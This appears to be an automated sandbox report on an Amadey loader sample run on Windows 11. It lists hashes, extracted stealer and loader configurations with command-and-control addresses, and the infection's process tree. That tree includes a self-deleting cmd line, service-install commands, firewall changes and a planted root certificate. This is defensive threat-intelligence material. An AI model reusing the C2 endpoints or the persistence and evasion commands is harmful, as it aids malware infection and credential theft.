amadey | 51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80

Analysis

max time kernel
118s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
11/05/2024, 21:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
Size

1.8MB
MD5

4e2205fd9d8da1dc5d8e4bdbe8020071
SHA1

12cc6bef5e192d5e8dce6d608be34347eb7c7768
SHA256

51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80
SHA512

97d1f712919300e7daa4d8ef20df25ec91362c8c2c48f1c5b40dfa203409951ab07d2ad5150d808012cb79aed07bfc7747c4a1e733b81e3cf7417736e7284873
SSDEEP

49152:AdZ4xNxnareyMA7kfPvhLClnrMWR7EU7jH/NBqZ:AdZ4NnareyMAIpLCln4Wvf/q

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@txthead

94.156.8.193:34427

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral2/memory/4548-37-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000100000002a9f8-50.dat	family_zgrat_v1
behavioral2/memory/2088-64-0x00000000006A0000-0x0000000000760000-memory.dmp	family_zgrat_v1
behavioral2/memory/4932-1001-0x0000018BB57C0000-0x0000018BB8FF4000-memory.dmp	family_zgrat_v1
behavioral2/memory/4932-1006-0x0000018BBAE90000-0x0000018BBAEB4000-memory.dmp	family_zgrat_v1
behavioral2/memory/4932-1002-0x0000018BD3880000-0x0000018BD398A000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 4 IoCs

resource	yara_rule
behavioral2/memory/1124-722-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/3340-723-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/2072-724-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/3156-781-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	BPm8VMr5JPFgyG0fd1Xc93iP.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

resource	yara_rule
behavioral2/files/0x000100000002a9f8-50.dat	family_redline
behavioral2/files/0x000100000002a9f7-46.dat	family_redline
behavioral2/memory/1512-60-0x0000000000BC0000-0x0000000000C12000-memory.dmp	family_redline
behavioral2/memory/2088-64-0x00000000006A0000-0x0000000000760000-memory.dmp	family_redline
behavioral2/files/0x000200000002a9fd-112.dat	family_redline
behavioral2/memory/4668-126-0x0000000000A20000-0x0000000000A72000-memory.dmp	family_redline
behavioral2/memory/3504-358-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/3504-358-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral2/files/0x000100000002aa0d-263.dat	family_xmrig
behavioral2/files/0x000100000002aa0d-263.dat	xmrig
behavioral2/files/0x000500000002a9f6-277.dat	family_xmrig
behavioral2/files/0x000500000002a9f6-277.dat	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4652	powershell.exe
2360	powershell.exe
5660	powershell.exe
5948	powershell.exe
2464	powershell.exe
5012	powershell.exe
5396	powershell.exe
2012	powershell.exe
2256	powershell.exe
788	powershell.exe
5680	powershell.exe
4688	powershell.exe
2532	powershell.exe
5580	powershell.exe
5664	powershell.exe
6064	powershell.exe
5780	powershell.exe
5632	powershell.exe
3168	powershell.exe
2012	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5568	netsh.exe
5964	netsh.exe
1944	netsh.exe
5804	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aErYuvQ4GD4obHw09VQTQynC.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHnBvr31EiWxyWhjZnAvjMwK.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wQA2T7DVEA4bWqsNOUB49OzH.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mnerr5ZPwROWtBA8X5nvRhoL.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VOXseU4fliS0NpiRqpTo5OWP.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BE81pbWU55hSQUk40O1nHkN.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lBKO2yvMkueH4I7kUXqx1rGO.bat	installutil.exe

Executes dropped EXE 41 IoCs

pid	Process
252	axplons.exe
3408	alex.exe
2088	trf.exe
1512	keks.exe
900	gold.exe
4668	redline1.exe
1680	install.exe
5072	GameService.exe
1508	GameService.exe
3660	GameService.exe
2272	GameService.exe
3604	GameService.exe
3640	GameSyncLink.exe
2680	368491.exe
4044	GameService.exe
4876	GameService.exe
2924	GameService.exe
3144	GameService.exe
4512	GameService.exe
4544	PiercingNetLink.exe
4788	GameService.exe
3888	GameService.exe
708	GameService.exe
3552	GameService.exe
1660	GameSyncLinks.exe
1704	swizzhis.exe
2900	779096.exe
1684	udated.exe
2856	Scanner.exe
1376	lumma1.exe
1816	axplons.exe
3328	file300un.exe
4928	SUk9Dx9KB9NHohPMqYPvcFtz.exe
1124	FszrjawS9fPLQZ7mFd7V7Lmw.exe
3340	0xYvEN3BkDObbHJJpOC5I8sz.exe
2072	YJwP5U6D0gUWXm0tvq2yHCEw.exe
3156	uJNyGwtKRLdEnZrYZRh3seW5.exe
3540	axplons.exe
128	BPm8VMr5JPFgyG0fd1Xc93iP.exe
4556	u3sw.0.exe
2916	u3sw.1.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe

Loads dropped DLL 3 IoCs

pid	Process
2680	368491.exe
8	RegAsm.exe
8	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
63	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
85	ipinfo.io
5	api.myip.com
74	ipinfo.io
83	api.myip.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	BPm8VMr5JPFgyG0fd1Xc93iP.exe
File opened for modification	C:\Windows\System32\GroupPolicy	BPm8VMr5JPFgyG0fd1Xc93iP.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	BPm8VMr5JPFgyG0fd1Xc93iP.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	BPm8VMr5JPFgyG0fd1Xc93iP.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3876	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
252	axplons.exe
1816	axplons.exe
3540	axplons.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 3408 set thread context of 4548	3408	alex.exe	85
PID 900 set thread context of 460	900	gold.exe	96
PID 1704 set thread context of 8	1704	swizzhis.exe	139
PID 1684 set thread context of 4620	1684	udated.exe	144
PID 2856 set thread context of 3504	2856	Scanner.exe	147
PID 1376 set thread context of 4656	1376	lumma1.exe	151
PID 2256 set thread context of 1436	2256	powershell.exe	157

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3116	sc.exe
4456	sc.exe
2280	sc.exe
1536	sc.exe
796	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1896	3408	WerFault.exe	83
1704	4928	WerFault.exe	160

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3sw.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3sw.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3sw.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5036	schtasks.exe
2704	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
3876	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
3876	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
252	axplons.exe
252	axplons.exe
1512	keks.exe
1512	keks.exe
1512	keks.exe
1512	keks.exe
2088	trf.exe
2088	trf.exe
4668	redline1.exe
4668	redline1.exe
4668	redline1.exe
4668	redline1.exe
4668	redline1.exe
4668	redline1.exe
1512	keks.exe
1512	keks.exe
8	RegAsm.exe
8	RegAsm.exe
8	RegAsm.exe
8	RegAsm.exe
3504	RegAsm.exe
3504	RegAsm.exe
3504	RegAsm.exe
1816	axplons.exe
1816	axplons.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
3540	axplons.exe
3540	axplons.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2088	trf.exe
Token: SeBackupPrivilege	2088	trf.exe
Token: SeSecurityPrivilege	2088	trf.exe
Token: SeSecurityPrivilege	2088	trf.exe
Token: SeSecurityPrivilege	2088	trf.exe
Token: SeSecurityPrivilege	2088	trf.exe
Token: SeDebugPrivilege	4668	redline1.exe
Token: SeDebugPrivilege	1512	keks.exe
Token: SeDebugPrivilege	4548	RegAsm.exe
Token: SeLockMemoryPrivilege	2900	779096.exe
Token: SeDebugPrivilege	3504	RegAsm.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	1436	installutil.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2900	779096.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe
2916	u3sw.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3876 wrote to memory of 252	3876	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe	82
PID 3876 wrote to memory of 252	3876	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe	82
PID 3876 wrote to memory of 252	3876	51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe	82
PID 252 wrote to memory of 3408	252	axplons.exe	83
PID 252 wrote to memory of 3408	252	axplons.exe	83
PID 252 wrote to memory of 3408	252	axplons.exe	83
PID 3408 wrote to memory of 2724	3408	alex.exe	84
PID 3408 wrote to memory of 2724	3408	alex.exe	84
PID 3408 wrote to memory of 2724	3408	alex.exe	84
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 3408 wrote to memory of 4548	3408	alex.exe	85
PID 4548 wrote to memory of 2088	4548	RegAsm.exe	89
PID 4548 wrote to memory of 2088	4548	RegAsm.exe	89
PID 4548 wrote to memory of 1512	4548	RegAsm.exe	90
PID 4548 wrote to memory of 1512	4548	RegAsm.exe	90
PID 4548 wrote to memory of 1512	4548	RegAsm.exe	90
PID 252 wrote to memory of 900	252	axplons.exe	93
PID 252 wrote to memory of 900	252	axplons.exe	93
PID 252 wrote to memory of 900	252	axplons.exe	93
PID 900 wrote to memory of 3248	900	gold.exe	95
PID 900 wrote to memory of 3248	900	gold.exe	95
PID 900 wrote to memory of 3248	900	gold.exe	95
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 900 wrote to memory of 460	900	gold.exe	96
PID 252 wrote to memory of 4668	252	axplons.exe	97
PID 252 wrote to memory of 4668	252	axplons.exe	97
PID 252 wrote to memory of 4668	252	axplons.exe	97
PID 252 wrote to memory of 1680	252	axplons.exe	98
PID 252 wrote to memory of 1680	252	axplons.exe	98
PID 252 wrote to memory of 1680	252	axplons.exe	98
PID 1680 wrote to memory of 5064	1680	install.exe	100
PID 1680 wrote to memory of 5064	1680	install.exe	100
PID 1680 wrote to memory of 5064	1680	install.exe	100
PID 5064 wrote to memory of 3116	5064	cmd.exe	140
PID 5064 wrote to memory of 3116	5064	cmd.exe	140
PID 5064 wrote to memory of 3116	5064	cmd.exe	140
PID 5064 wrote to memory of 5072	5064	cmd.exe	103
PID 5064 wrote to memory of 5072	5064	cmd.exe	103
PID 5064 wrote to memory of 5072	5064	cmd.exe	103
PID 5064 wrote to memory of 4456	5064	cmd.exe	104
PID 5064 wrote to memory of 4456	5064	cmd.exe	104
PID 5064 wrote to memory of 4456	5064	cmd.exe	104
PID 5064 wrote to memory of 1508	5064	cmd.exe	105
PID 5064 wrote to memory of 1508	5064	cmd.exe	105
PID 5064 wrote to memory of 1508	5064	cmd.exe	105
PID 5064 wrote to memory of 3660	5064	cmd.exe	106
PID 5064 wrote to memory of 3660	5064	cmd.exe	106
PID 5064 wrote to memory of 3660	5064	cmd.exe	106
PID 5064 wrote to memory of 2272	5064	cmd.exe	107
PID 5064 wrote to memory of 2272	5064	cmd.exe	107
PID 5064 wrote to memory of 2272	5064	cmd.exe	107

C:\Users\Admin\AppData\Local\Temp\51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe
"C:\Users\Admin\AppData\Local\Temp\51126880451691888540ee558a86826cc17f46ae37b5428171844fe887ffff80.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3876
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:252
- - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
    "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3408
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2724
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4548
    - - C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2088
    - - C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:2932
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3408 -s 364
      4⤵
      Program crash
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:900
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3248
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:460
- - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4668
- - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5064
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:3116
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:5072
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:4456
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:1508
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:3660
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:2272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:1104
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:2280
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        Executes dropped EXE
        
        PID:4044
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:1536
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        Executes dropped EXE
        
        PID:4876
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:2924
